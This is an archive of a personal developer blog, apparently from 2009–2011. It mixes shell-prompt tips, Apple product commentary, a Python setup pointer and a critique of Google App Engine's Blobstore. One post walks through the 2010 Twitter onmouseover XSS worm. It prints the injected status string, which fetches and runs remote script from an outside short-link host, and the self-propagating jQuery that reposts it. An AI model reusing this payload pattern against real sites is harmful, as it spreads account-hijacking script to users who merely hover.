Interviewed (Hebrew) on Hadoop at CodeRadio

Hadoop, Programming May 29th, 2011

I’ve met with Ariel and Shy from CodeRadio.co.il to talk about Hadoop technologies. You can go ahead and listen (or download on your iTunes) here:

http://www.coderadio.co.il/?p=69

(Yes, its been a while back but I’ve failed to update here :) )

Tags: ,

Show the Current RVM Info in Your Command Prompt

Programming February 7th, 2011

I’ve recently started using RVM to manage the Ruby versions and Gem sets of the different projects I’m working on.
So, much like showing the current Git branch, its really useful to show the current RVM environment as part of the command prompt. So I just added rvm-prompt to the previous snippet.
To use this, just add the following to your  ~/.profile file:

PS1="$GREEN\u@machine$NO_COLOUR:\w:$LIGHT_GRAY\$(~/.rvm/bin/rvm-prompt i v g)$NO_COLOUR:$YELLOW\$(parse_git_branch)$NO_COLOUR\$ "

Tags: , , ,

Show the Current GIT Branch in Your Command Prompt

Programming January 10th, 2011

One fo the most confusing things when working with multiple branches on git is having to remember the branch you’re currently working on.
Typing git branch all the time is annoying…

Thats why I’ve set my shell’s prompt to display the current branch!
Just add the following to your  ~/.profile file:

Tags: , ,

Mac App Store Insights

Technology January 8th, 2011

Its not in iTunes

When hearing the news that the Mac AppStore was launched I immediately opened iTunes, but didn’t find it there.
I went online and read that an OS X update is required so I ran Software Update – there was no iTunes update but there was an OS X update so I figured the new App Store must be in the Applications folder.

Apparently I’m not the only one who got confused… Apple had to add a tutorial explaining how to get to the store (click the Get the Mac App Store button)

What does it mean that the Mac store is separated from, well, everything else? I guess we’ll have to wait and see…

Pricing

The first thing you notice about the Mac App Store is that its prices seem expensive.
Prices in the Mac App Store are significantly higher than the apps in the iOS App Store. This is probably due to the fact that the Mac App Store prices are anchored to whatever prices current software developers (including Apple) are charging on other channels, unlike the iOS App Store which opened up a brand new market.

I’m hoping that unlike the iOS App Store, the Mac App Stor want fall into the prices-race-to-the-bottom trap so that it can become a viable channel for independent developers without having to sell their software at a loss and look for income alternative.
However, as the store becomes more popular and crowded that will probably be the case as lowering prices is best way to get noticed…

For more details, here’s a detailed pricing breakown of the Mac App Store.

UI Design isn’t strongly enforced

Apple has been pretty strict to enforce its HIG (Human Interface Guidelines) on iOS apps. Its not as strict when it comes to the Mac…
Application developer have much more liberty in choosing their interface design, which is not necessarily good as apps differ in behavior and confuse users (not an App Store example but I personally hate Mac’s Photoshop interface that doesn’t act like.. umm… some weird toolbars thingie instead of being a window like any other app…).
You can find a showcase of the Mac App Store worst app interfaces at the Read the fucking HIG blog :)

Software Updates

One of the App Store benefits is being able to update installed apps with one click.
The difference here from the iOS App Store is that certain apps can be installed from other distribution channels, not just from the App Store.
However, even if you installed your app not through the Mac App Store,it is still likely that the Mac App Store will recognize your app and support updating it.
Which is pretty neat :)

According to this, it seems that the Mac App Store matches the software using the software’s bundle IS and version number:

DEVELOPER UPDATE: seems it’s all about the bundle ID bundle ID and version number. These are the same for our Mac App Store build and our direct download build. So the Mac App Store thinks the app is installed, even if it’s a trial downloaded from our website. In some ways, actually, this is good for the customer — it prevents accidental or mistaken unnecessary re-purchases! But, it means you have to drag to trash if you want to purchase from the MAS. (I think Apple should use the bundle ID in conjunction with Apple ID purchase history to decide if the button should say “Buy” or not. And maybe if the Bundle ID matches but no purchase in their history, there’s a “Are you sure you need this?” dialog for safety.)

Small Store, Big Opportunity

The Mac App Store is still very small. It only has 1000 which sounds like a lot but really isn’t… and most apps are kinda crappy…
There’s a very good opportunity here to catch some early attention with good app…

Tags: ,

The Complete Guide to Setting up Python Development Environment on Windows

Programming, Python September 23rd, 2010

Setting up Python for development on a Windows environment turns out to be not such an easy task.
After setting up several such environments and running into all sort of problems I had to figure out I decided it would probably be worthwhile for myself and other developers to document the process…

If you’re starting Python development on Windows, and especially if you’re using Google App Engine (as this guide is about Python 2.5.4) this guide is for you…

Tags: ,

Write your own Twitter.com XSS exploit

Programming, Technology September 21st, 2010

So it seems the new twitter.com has a “virus” going around.
Few minutes ago my twitter stream filled up with strange jQuery calls so I looked into it.

Apperantly the new Twitter website is colunerable to a simple SQL-Injection like attack.
It’ll just spit out to the page whatever HTML code you write on your status…

So, the exploit work like this:

Step 1:

User writes the following status line:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′)”/

the @” basically closes the tweet’s html element title attribute and lets the hacker had his own attributes. Specifically an onmouseover attribute that’ll run his JavaScript code when the users hover over the tweet.

Step 2:

The onmouseover event fetches and executes a remote JS code from

http://is.gd/fl9A7

Step 3:

The remote script (which is not subject to size limits like the script embedded in the user’s status can basically do whatever the hacker wants.
This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:

$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"\
onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();
$('#status-field-char-counter').html("ekampf owns you!");
$('#status').val('I read how to do this on DeveloperZen.com');
$('.status-update-form').submit();

Besides submitting tweets, you can pretty much do whatever you want with the page’s UI etc…
lots of fun…

Tags: , ,

New DeveloperZen

Blogging September 19th, 2010

DeveloperZen has a new design!
There’s sill some work to be done and empty content pages to be filled, so there’s going to be a lot of re-organizing
in the following days (especially the categories list that needs to be optimized).

Would love to hear your comments about the new design and the blog in general…

What the new Apple TV is really missing…

Technology September 2nd, 2010

whatis_gallery_slide120100901I was watching the Apple launch event the other day and I must say I was a bit disappointed.
Don’t get me wrong the device is small and slick and the 99$ puts it in the right price range to compete with other streamers in the market. 
The problem is, that besides connecting to iTunes, the Apple TV its not much different than the rest of the bunch.
Apple isn’t taking advantage of its platform strengths the same way its doing with its other devices…

Why isn’t the Apple TV Social?

Apple just launched its own social network – Ping. Why isn’t Ping data featured on the Apple TV?
I’d like see what my friends watched, get recommendations and share stuff I Like.

Where are the Apps?!

The iPhone, iPod and iPad are thriving on a vibrant Apps market. Why can’t the Apple TV do the same?
I was really expecting an iOS driven device where developers could enhance the Apple TV capabilities by providing apps specifically designed to be run on TV set with limited controls.

You could browse social networks (Facebook, Twitter etc.), or watch stock market information, or browse content from your favorite feeds and content providers (imagine something like the iPad’s Flipboard your big LCD TV), or cook with your TV’s help (imagine Jamie Oliver’s iPhone app on the big screen) or get apps from content providers (like local news channels for example) that’ll be able to stream their own content…
There’s tons of stuff developers could do with the Apple TV if given the option.

Apple could have really taken the streamers to a whole new level with this…

In short, I wish Apple TV would be more like Boxee Smile

Tags: ,

3 Takeaways from the Apple iPad Launch

Technology January 28th, 2010

A Computer That Doesn’t Feel Like A Computer

Its not a geek device, its a computing appliance. The iPad is a computer with an iPhone OS. Not a full fledged Os like we’re used to, no multitasking, terminal, filesystems…
Just a list of Apps that can be installed and updated from the net. Simple, elegant, and exactly what most people who aren’t computer geeks need.
The perfect “laptop” for mom and dad…


Apple Sells Relationship, Not Hardware

The iPad’s amazing pricing just shows that Apple is really counting on people using the heck out of their device… that means buying apps, books, music and videos. Its building a relationship with its customer that gets stronger and stronger with each purchase on iTunes.

Customers who have all their applications, games, books, music and videos on iTunes are locked in the Apple ecosystem. They’re vested in it…
They’re not going to easily switch to an Android or a Zune…

HP\Dell\Asus\etc. only make money the moment you purchase their hardware (and on support and stuff) they make no difference if you use it or not. Microsoft too, only makes money when you buy your Windows license.

Apple on the other hand keeps monetizing its customers way after they left the Apple Store with their latest new device – when they buy content for their device. They keep and nurture a profitable relationship with their customers and thats a way better business than a one-off hardware\license sale…

(btw, Microsoft is learning about making profit from a relationship too… that’s what drives its Xbox business)

iBooks Can Change the Publishing Industry

Before the iTunes Music store, buying songs at a ridiculous 99c price was inconceivable. The iPhone App Store did the same to applications, changing the the economy (checkout this excellent App Economy graphic) of application taking prices down.

Same could (and would probably) happend with books…  but there’s more!

Unlike Amazin’s Kindle (and Sony’s reader and the rest of the bunch) which support a very limited interaction – text and some grey imagery – the iPad comes with a big, colorful touchscreen and a CPU that can handle 3D gaming.
The iPad’s hardware is perfect for interactive content and the Times Magazine demo showed during the launch shows a glimpse of  how our future books and magazines should look and feel on electronic media.
Electronic “print” is going to be much more interactive and rich which means the entire process of book production changes.
The publishers’ role changes from mass printing and delivery to production of interactive content, the way authors work changes, and distribution costs drop…

Tags: , , , ,

The New Google App Engine Blobstore API – First Thoughts

Cloud Computing, Programming December 15th, 2009

Google’s App Engine 1.3.0 was released yesterday along with a brand new Blobstore API allowing the storage and serving of files up to 50MB.

Store and Serve – Files can be uploaded and stored as blobs, to be served later in response to user requests. Developers can build their own organizational structures and access controls on top of blobs.

The way this API works is pretty simple. To upload files you can an API that manufactures a POST URL that web forms requests containing files data are submitted to. App Engine processes the POST request and created the blobs in its storage (and BlobInfo objects – readonly datastore entities containing the metadata on each blob). It then rewrites the request, removing the uploaded files data and replacing them a Blobstore key pointing to the stored blob in the App Engine Blobstore, and calls your handler with this data.

To serve an existing blob in your app, you put a special header in the response containing the blob key. App Engine replaces the body of the response with the content of the blob.

Now this is pretty straightforward but there are few concerns with this approach:

1. What about request validation (authentication\authorization etc.)?

When uploading files, the request reaches your code only after blobs have already been processed and stored. This means that you can only handle authentication\authorization or even form validation after data has been stored.

This means you’ll have to write code to clean the relevant blob entries in case of failed authentication\authorization\validation – more datastore API calls, more CPU…

It also means that without taking care of these special cases any newbie hacker with a simple snifter (or FireBug) can start uploading (and potentially) serving files off your service (see update).

2. No way to preprocess data

As the files data is already stored prior to the program’s handler being called, there’s no way to preprocess submitted data other than reading it from the store, processing it and storing it again.

There’s also no straightforward API to access or store blob data in code, so the above process has to be implementing using URL fetching (fetch the image via http call, process it, store it again using http POST call)

There must be a way for the Google App Engine team to wrap this app nicely and provide a clean API for this to be done efficiently (along with solving the validation problem described before)

 

As the Blogstore API is still in experimental phase I guess we’ll see some quick progress made on its development and hopefully the Google team will solve the issues above.

Atleast now there’s a beginning of an alternative to Amazon S3 for AppEngine applications.

 

Update:

Bret Slatkin notes that when the API manufactures the POST URL to be used for uploading the files, it creates a unique one-time URL which which mitigates any potential sniffing.
This fits perfectly for the scenario when you’re rendering a web form to be submitted by the user. But, it makes things harder if you’re trying to provide a REST API that allows uploading files (think of something like TwitPic for example). In this case you’ll have to write your own render that simulates what a web form would do (get the files, create random POST URL, call it, …)

Tags: ,